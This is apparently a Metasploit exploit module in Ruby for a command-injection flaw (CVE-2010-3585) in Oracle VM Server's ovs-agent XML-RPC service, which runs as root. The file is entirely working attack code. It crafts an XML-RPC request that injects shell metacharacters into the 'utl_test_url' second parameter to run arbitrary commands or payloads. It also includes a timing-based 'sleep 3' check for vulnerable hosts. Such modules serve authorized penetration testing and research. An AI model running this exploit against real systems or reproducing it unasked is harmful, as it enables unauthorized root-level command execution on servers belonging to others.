##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle VM Server Virtual Server Agent Command Injection',
      'Description'    => %q{
          This module exploits a command injection flaw within Oracle\'s VM Server
        Virtual Server Agent (ovs-agent) service.

        By including shell meta characters within the second parameter to the 'utl_test_url'
        XML-RPC methodCall, an attacker can execute arbitrary commands. The service
        typically runs with root privileges.

        NOTE: Valid credentials are required to trigger this vulnerable. The username
        appears to be hardcoded as 'oracle', but the password is set by the administrator
        at installation time.
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          # ovs-agent.spec:- Fix ovs agent command injection [orabug 10146644] {CVE-2010-3585}
          ['CVE', '2010-3585'],
          ['OSVDB', '68797'],
          ['BID', '44047']
        ],
      'Privileged'     => true,
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space' => 512,
          'BadChars' => '<>',
          'DisableNops' => true,
          'Keys'  => ['cmd', 'cmd_bash'],
        },
      'Targets'        => [ ['Automatic', { }], ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Oct 12 2010'
      ))

    register_options(
      [
        Opt::RPORT(8899),
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
        OptString.new('CMD', [ false,  "A single command to execute instead of the payload" ]),
        OptString.new('HttpUsername', [ true,  "The user to authenticate as", 'oracle']),
        OptString.new('HttpPassword', [ true,  "The password to authenticate with" ])
      ])

    deregister_options(
      'HTTP::junk_params', # not your typical POST, so don't inject params.
      'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
      )
  end

  def go(command)
    xml = <<-EOS
<?xml version="1.0"?>
<methodCall>
<methodName>utl_test_url</methodName>
<params><param>
<value><string>PARAM1</string></value>
</param></params>
<params><param>
<value><string>PARAM2</string></value>
</param></params>
<params><param>
<value><string>PARAM3</string></value>
</param></params>
<params><param>
<value><string>PARAM4</string></value>
</param></params>
</methodCall>
EOS

    sploit = rand_text_alphanumeric(rand(128)+32)
    sploit << "';" + command + ";'"

    xml.gsub!(/PARAM1/, 'http://' + rand_text_alphanumeric(rand(128)+32) + '/')
    xml.gsub!(/PARAM2/, sploit)
    xml.gsub!(/PARAM3/, rand_text_alphanumeric(rand(128)+32))
    xml.gsub!(/PARAM4/, rand_text_alphanumeric(rand(128)+32))

    res = send_request_cgi(
      {
        'uri'          => '/RPC2',
        'method'       => 'POST',
        'ctype'        => 'application/xml',
        'data'         => xml,
      }, 5)

    if not res
      if not session_created?
        print_error('Unable to complete XML-RPC request')
        return nil
      end

      # no response, but session created!!!
      return true
    end

    case res.code
    when 403
      print_error('Authentication failed!')
      return nil

    when 200
      print_good('Our request was accepted!')
      return res

    end

    print_error("Encountered unexpected #{res.code} response:")
    print_error(res.to_s)

    return nil
  end

  def check
    print_status("Attempting to detect if the server is vulnerable...")

    # Try running/timing sleep 3
    start = Time.now
    go('sleep 3')
    elapsed = Time.now - start
    if elapsed >= 3 and elapsed <= 4
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Attempting to execute the payload...")

    cmd = datastore['CMD']
    cmd ||= payload.encoded

    if not go(cmd)
      fail_with(Failure::Unknown, "Unable to execute the desired command")
    end

    handler
  end
end
